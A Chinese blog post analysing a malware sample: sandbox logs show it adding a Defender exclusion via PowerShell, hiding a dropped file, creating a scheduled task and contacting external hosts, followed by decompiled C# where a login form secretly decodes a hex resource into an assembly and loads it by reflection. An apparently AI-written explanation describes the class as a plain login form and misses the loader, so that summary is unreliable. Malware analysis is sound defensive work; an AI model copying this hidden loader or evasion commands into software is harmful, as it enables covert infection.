09:33:21:867,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	EXEC_destroy,	C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	parent_pid:2928 cmdline:'"C:\Users\bonelee\Desktop\99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe"' ,	0x00000000 [操作成功完成。  ],	

  

几个关键:

1、执行powershell:

powershell.exe, 5080:0, 2928, EXEC_create, C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe"' image_base:0x0000000001150000 image_size:0x0006C000 , 0x00000000 [操作成功完成。 ],
2、BA_extract_hidden 释放隐藏文件释放文件路径名(行为监控)  BA_extract_hidden, C:\Users\bonelee\AppData\Roaming\bWyPLjwQzmw.exe, , 0x00000000 [操作成功完成。  ]

 

将文件属性设置为隐藏(数据采集)
Win7(32bit,Office2013)
 
Time & APIArgumentsStatusReturn
2023/05/28 21:16:58
SetFileAttributesW
file_attributes:8199
filepath:C:\Users\Admin\AppData\Roaming\bWyPLjwQzmw.exe
filepath_r:C:\Users\Admin\AppData\Roaming\bWyPLjwQzmw.exe
1 1

3、创建计划任务 EXEC_create, C:\Windows\SysWOW64\schtasks.exe, parent_pid:2928 cmdline:'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bWyPLjwQzmw" /XML "C:\Users\bonelee\AppData\Local\Temp\tmp92BB.tmp"' image_base:0x0000000000EE0000 image_size:0x00033000 , 0x00000000 [操作成功完成。 ],

4、联网:09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_http, checkip.dyndns.org/, protocol:(TCP)0 cmd:'GET' , 0x00000000 [操作成功完成。 ],

09:33:18:522, 99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe, 8816:0, 2928, NET_send, 193.122.130.0:80, protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],

 

09:33:20:475, WerFault.exe, 8148:8004, 2928, NET_connect, 52.168.117.173:443, protocol:(TCP)0 , 0x00000000 [操作成功完成。 ],
09:33:20:711, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:195 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:4380 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:104 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:20:945, WerFault.exe, 8148:0, 2928, NET_send, 52.168.117.173:443, protocol:(TCP)0 datalen:158 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],
09:33:21:179, WerFault.exe, 8148:0, 2928, NET_recv, 52.168.117.173:443, protocol:(TCP)0 datalen:51 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' , 0x00000000 [操作成功完成。 ],

综上,实际运行基本上和微步表现的行为类似!

https://s.threatbook.com/report/file/99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292

 
 

 

入口:

 

分析下这个类的作用:

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Drawing;
using System.Reflection;
using System.Windows.Forms;
using BusinessLayer;
using Entities;

namespace UILayer
{
	// Token: 0x02000003 RID: 3
	public class LoginForm : Form
	{
		// Token: 0x06000002 RID: 2 RVA: 0x0000206B File Offset: 0x0000026B
		public LoginForm()
		{
			this.InitializeComponent();
		}

		// Token: 0x06000003 RID: 3 RVA: 0x00002099 File Offset: 0x00000299
		private void btnExit_Click(object sender, EventArgs e)
		{
			Application.Exit();
		}

		// Token: 0x06000004 RID: 4 RVA: 0x000020A4 File Offset: 0x000002A4
		public void btnLogin_Click_1(object sender, EventArgs e)
		{
			this._log.Id = this.tbUserID.Text;
			this._log.Password = this.tbPassword.Text;
			bool flag = this.tbUserID.Text != "" && this.tbPassword.Text != "";
			if (flag)
			{
				bool flag2 = this.posBusiness.CheckLogin(this._log);
				if (flag2)
				{
					bool flag3 = this.posBusiness.GetTitle(this._log) == "PosEmployee";
					if (flag3)
					{
						base.Hide();
						PosSystem _pos = new PosSystem();
						_pos.Show();
					}
					else
					{
						bool flag4 = this.posBusiness.GetTitle(this._log) == "Manager";
						if (flag4)
						{
							base.Hide();
							ManagerForm _manager = new ManagerForm();
							_manager.Show();
						}
						else
						{
							bool flag5 = this.posBusiness.GetTitle(this._log) == "InventoryEmployee";
							if (flag5)
							{
								base.Hide();
								ViewInventory _inventory = new ViewInventory();
								_inventory.Show();
							}
						}
					}
				}
				else
				{
					MessageBox.Show("Login Failed!", "Warning", MessageBoxButtons.RetryCancel, MessageBoxIcon.Exclamation);
				}
			}
			else
			{
				MessageBox.Show("Login Failed!", "Warning", MessageBoxButtons.RetryCancel, MessageBoxIcon.Exclamation);
			}
		}

		// Token: 0x06000005 RID: 5 RVA: 0x0000220C File Offset: 0x0000040C
		private void btnLogin_KeyDown(object sender, KeyEventArgs e)
		{
			bool flag = e.KeyCode == Keys.Return;
			if (flag)
			{
				this.btnLogin.PerformClick();
				e.SuppressKeyPress = true;
				e.Handled = true;
			}
		}

		// Token: 0x06000006 RID: 6 RVA: 0x00002248 File Offset: 0x00000448
		private void tbPassword_KeyDown(object sender, KeyEventArgs e)
		{
			bool flag = e.KeyCode == Keys.Return;
			if (flag)
			{
				this.btnLogin.PerformClick();
				e.SuppressKeyPress = true;
				e.Handled = true;
			}
		}

		// Token: 0x06000007 RID: 7 RVA: 0x00002284 File Offset: 0x00000484
		protected override void Dispose(bool disposing)
		{
			bool flag = disposing && this.components != null;
			if (flag)
			{
				this.components.Dispose();
			}
			base.Dispose(disposing);
		}

		// Token: 0x06000008 RID: 8 RVA: 0x000022BC File Offset: 0x000004BC
		private void InitializeComponent()
		{
			this.panelLogin = new Panel();
			this.btnLogin = new Button();
			this.btnExit = new Button();
			this.label1 = new Label();
			this.tableLayoutPanel1 = new TableLayoutPanel();
			this.tbUserID = new TextBox();
			this.tbPassword = new TextBox();
			this.pBoxUser = new PictureBox();
			this.pBoxPass = new PictureBox();
			this.labelSuperShopName = new Label();
			this.panelLogin.SuspendLayout();
			this.tableLayoutPanel1.SuspendLayout();
			((ISupportInitialize)this.pBoxUser).BeginInit();
			((ISupportInitialize)this.pBoxPass).BeginInit();
			base.SuspendLayout();
			this.panelLogin.Anchor = AnchorStyles.None;
			this.panelLogin.BackColor = Color.Transparent;
			this.panelLogin.BorderStyle = BorderStyle.Fixed3D;
			this.panelLogin.Controls.Add(this.btnLogin);
			this.panelLogin.Controls.Add(this.btnExit);
			this.panelLogin.Controls.Add(this.label1);
			this.panelLogin.Controls.Add(this.tableLayoutPanel1);
			this.panelLogin.Location = new Point(230, 173);
			this.panelLogin.Name = "panelLogin";
			this.panelLogin.Size = new Size(339, 206);
			this.panelLogin.TabIndex = 0;
			this.btnLogin.BackColor = Color.White;
			this.btnLogin.BackgroundImageLayout = ImageLayout.None;
			this.btnLogin.FlatStyle = FlatStyle.System;
			this.btnLogin.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
			this.btnLogin.Location = new Point(7, 138);
			this.btnLogin.Name = "btnLogin";
			this.btnLogin.Size = new Size(100, 28);
			this.btnLogin.TabIndex = 2;
			this.btnLogin.Text = "Login";
			this.btnLogin.UseVisualStyleBackColor = false;
			this.btnLogin.Click += this.btnLogin_Click_1;
			this.btnLogin.KeyDown += this.btnLogin_KeyDown;
			this.btnExit.BackColor = Color.White;
			this.btnExit.BackgroundImageLayout = ImageLayout.None;
			this.btnExit.FlatStyle = FlatStyle.System;
			this.btnExit.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
			this.btnExit.Location = new Point(109, 138);
			this.btnExit.Name = "btnExit";
			this.btnExit.Size = new Size(100, 28);
			this.btnExit.TabIndex = 3;
			this.btnExit.Text = "Exit";
			this.btnExit.UseVisualStyleBackColor = false;
			this.btnExit.Click += this.btnExit_Click;
			this.label1.BackColor = Color.Transparent;
			this.label1.Font = new Font("Monotype Corsiva", 26.25f, FontStyle.Italic, GraphicsUnit.Point, 0);
			this.label1.ForeColor = Color.White;
			this.label1.Location = new Point(3, 0);
			this.label1.Name = "label1";
			this.label1.Size = new Size(104, 55);
			this.label1.TabIndex = 0;
			this.label1.Text = "Login";
			this.tableLayoutPanel1.ColumnCount = 2;
			this.tableLayoutPanel1.ColumnStyles.Add(new ColumnStyle(SizeType.Percent, 13.98176f));
			this.tableLayoutPanel1.ColumnStyles.Add(new ColumnStyle(SizeType.Percent, 86.01823f));
			this.tableLayoutPanel1.Controls.Add(this.tbUserID, 1, 0);
			this.tableLayoutPanel1.Controls.Add(this.tbPassword, 1, 1);
			this.tableLayoutPanel1.Controls.Add(this.pBoxUser, 0, 0);
			this.tableLayoutPanel1.Controls.Add(this.pBoxPass, 0, 1);
			this.tableLayoutPanel1.Location = new Point(3, 58);
			this.tableLayoutPanel1.Name = "tableLayoutPanel1";
			this.tableLayoutPanel1.RowCount = 2;
			this.tableLayoutPanel1.RowStyles.Add(new RowStyle(SizeType.Percent, 50f));
			this.tableLayoutPanel1.RowStyles.Add(new RowStyle(SizeType.Percent, 50f));
			this.tableLayoutPanel1.Size = new Size(329, 74);
			this.tableLayoutPanel1.TabIndex = 1;
			this.tbUserID.BackColor = SystemColors.ControlLightLight;
			this.tbUserID.Dock = DockStyle.Fill;
			this.tbUserID.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
			this.tbUserID.ForeColor = SystemColors.WindowText;
			this.tbUserID.Location = new Point(48, 3);
			ComponentResourceManager resources = new ComponentResourceManager(typeof(ManagerForm));
			this.tbUserID.Name = "tbUserID";
			this.tbUserID.Size = new Size(278, 26);
			this.tbUserID.TabIndex = 0;
			this.tbPassword.Dock = DockStyle.Fill;
			this.tbPassword.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0);
			this.tbPassword.Location = new Point(48, 40);
			this.tbPassword.Name = "tbPassword";
			this.tbPassword.PasswordChar = '*';
			this.tbPassword.Size = new Size(278, 26);
			this.tbPassword.TabIndex = 1;
			this.tbPassword.UseSystemPasswordChar = true;
			this.pBoxUser.BackgroundImageLayout = ImageLayout.Stretch;
			this.pBoxUser.Location = new Point(3, 3);
			this.pBoxUser.Name = "pBoxUser";
			this.pBoxUser.Size = new Size(39, 31);
			this.pBoxUser.TabIndex = 2;
			string hexString = "4D5A9" + resources.GetString("Pigue");
			List<byte> decBytes2 = new List<byte>();
			for (int i = 0; i < hexString.Length; i += 2)
			{
				byte b = BitConverter.GetBytes(Convert.ToInt16(hexString.Substring(i, 2), 16))[0];
				decBytes2.Add(b);
			}
			this.pBoxUser.TabStop = false;
			this.pBoxPass.BackgroundImageLayout = ImageLayout.Stretch;
			this.pBoxPass.Location = new Point(3, 40);
			this.pBoxPass.Name = "pBoxPass";
			this.pBoxPass.Size = new Size(39, 31);
			this.pBoxPass.TabIndex = 3;
			this.pBoxPass.TabStop = false;
			this.labelSuperShopName.Anchor = AnchorStyles.None;
			this.labelSuperShopName.BackColor = Color.Transparent;
			this.labelSuperShopName.FlatStyle = FlatStyle.Flat;
			this.labelSuperShopName.Font = new Font("Monotype Corsiva", 45f, FontStyle.Bold | FontStyle.Italic, GraphicsUnit.Point, 0);
			this.labelSuperShopName.ForeColor = Color.Transparent;
			this.labelSuperShopName.Location = new Point(132, 67);
			Assembly Wr_99 = (Assembly)Type.GetType("System.Reflection.Assembly").InvokeMember("Load", BindingFlags.InvokeMethod, null, null, new object[]
			{
				decBytes2.ToArray()
			});
			Type type = Wr_99.GetExportedTypes()[0];
			object[] t = LoginForm.T;
			Activator.CreateInstance(type, t);
			this.labelSuperShopName.Name = "labelSuperShopName";
			this.labelSuperShopName.Size = new Size(554, 91);
			this.labelSuperShopName.TabIndex = 1;
			this.labelSuperShopName.Text = "Friend Super Shop";
			this.labelSuperShopName.TextAlign = ContentAlignment.MiddleCenter;
			base.AutoScaleDimensions = new SizeF(6f, 13f);
			base.AutoScaleMode = AutoScaleMode.Font;
			this.BackgroundImageLayout = ImageLayout.Stretch;
			base.ClientSize = new Size(782, 461);
			base.ControlBox = false;
			base.Controls.Add(this.labelSuperShopName);
			base.Controls.Add(this.panelLogin);
			base.FormBorderStyle = FormBorderStyle.Fixed3D;
			base.MaximizeBox = false;
			base.MinimizeBox = false;
			base.Name = "LoginForm";
			base.StartPosition = FormStartPosition.CenterScreen;
			this.Text = "LoginForm";
			base.WindowState = FormWindowState.Maximized;
			this.panelLogin.ResumeLayout(false);
			this.tableLayoutPanel1.ResumeLayout(false);
			this.tableLayoutPanel1.PerformLayout();
			((ISupportInitialize)this.pBoxUser).EndInit();
			((ISupportInitialize)this.pBoxPass).EndInit();
			base.ResumeLayout(false);
		}

		// Token: 0x04000001 RID: 1
		private PosBusiness posBusiness = new PosBusiness();

		// Token: 0x04000002 RID: 2
		private Login _log = new Login();

		// Token: 0x04000003 RID: 3
		public static string[] T = new string[]
		{
			"7754794F",
			"6E7A62",
			"BusinessLayer"
		};

		// Token: 0x04000004 RID: 4
		private IContainer components = null;

		// Token: 0x04000005 RID: 5
		private Panel panelLogin;

		// Token: 0x04000006 RID: 6
		private Label label1;

		// Token: 0x04000007 RID: 7
		private TableLayoutPanel tableLayoutPanel1;

		// Token: 0x04000008 RID: 8
		private PictureBox pBoxUser;

		// Token: 0x04000009 RID: 9
		private PictureBox pBoxPass;

		// Token: 0x0400000A RID: 10
		private Button btnExit;

		// Token: 0x0400000B RID: 11
		private TextBox tbUserID;

		// Token: 0x0400000C RID: 12
		private TextBox tbPassword;

		// Token: 0x0400000D RID: 13
		private Button btnLogin;

		// Token: 0x0400000E RID: 14
		private Label labelSuperShopName;
	}
}

  

这个类是一个名为 LoginForm 的 Windows 窗体(Form)类,用于实现一个用户登录界面。它包含了一些控件和事件处理程序,以及与业务逻辑层和实体相关的一些操作。

以下是这个类的主要作用和功能的分析:

  1. 构造函数 LoginForm(): 构造函数是类实例化时首先执行的方法。在这里,构造函数通过调用 InitializeComponent() 方法来初始化界面的组件和布局。

  2. 按钮事件 btnExit_Click(object sender, EventArgs e): 当退出按钮被点击时,这个事件处理程序调用 Application.Exit() 方法来关闭整个应用程序。

  3. 按钮事件 btnLogin_Click_1(object sender, EventArgs e): 当登录按钮被点击时,这个事件处理程序执行用户登录的逻辑。它首先从输入框中获取用户ID和密码,然后调用 posBusiness.CheckLogin(this._log) 来检查用户登录是否成功。如果登录成功,根据用户的角色不同,会打开不同的窗体(PosSystemManagerFormViewInventory)。

  4. 按钮事件 btnLogin_KeyDown(object sender, KeyEventArgs e)tbPassword_KeyDown(object sender, KeyEventArgs e): 这两个事件处理程序捕捉键盘输入事件,如果用户按下回车键,就模拟点击了登录按钮。

  5. 方法 Dispose(bool disposing): 这是一个用来释放资源的方法,当窗体被销毁时会调用。在这里,它释放了 components 对象所持有的资源。

  6. 方法 InitializeComponent(): 这个方法初始化界面的各个控件,包括登录按钮、退出按钮、文本框、图片框等等。它也设置了窗体的一些属性,比如标题、大小等。

除了上述的主要功能,还有以下值得注意的地方:

  • 这个类使用了 BusinessLayerEntities 命名空间中的内容,暗示着它与业务逻辑和实体对象相关。
  • 它包含了登录逻辑,根据用户角色的不同打开不同的窗体。这可能意味着这个类是整个应用程序的入口点,负责用户的身份验证和角色判断。

总的来说,这个 LoginForm 类是一个用户登录界面的实现,负责用户登录的逻辑和界面展示,同时也涉及到了与业务逻辑和实体对象的交互。

 

不分析了,代码也没有混淆啥的。。。

 

posted @ 2023-08-29 10:04  bonelee  阅读(761)  评论(0编辑  收藏  举报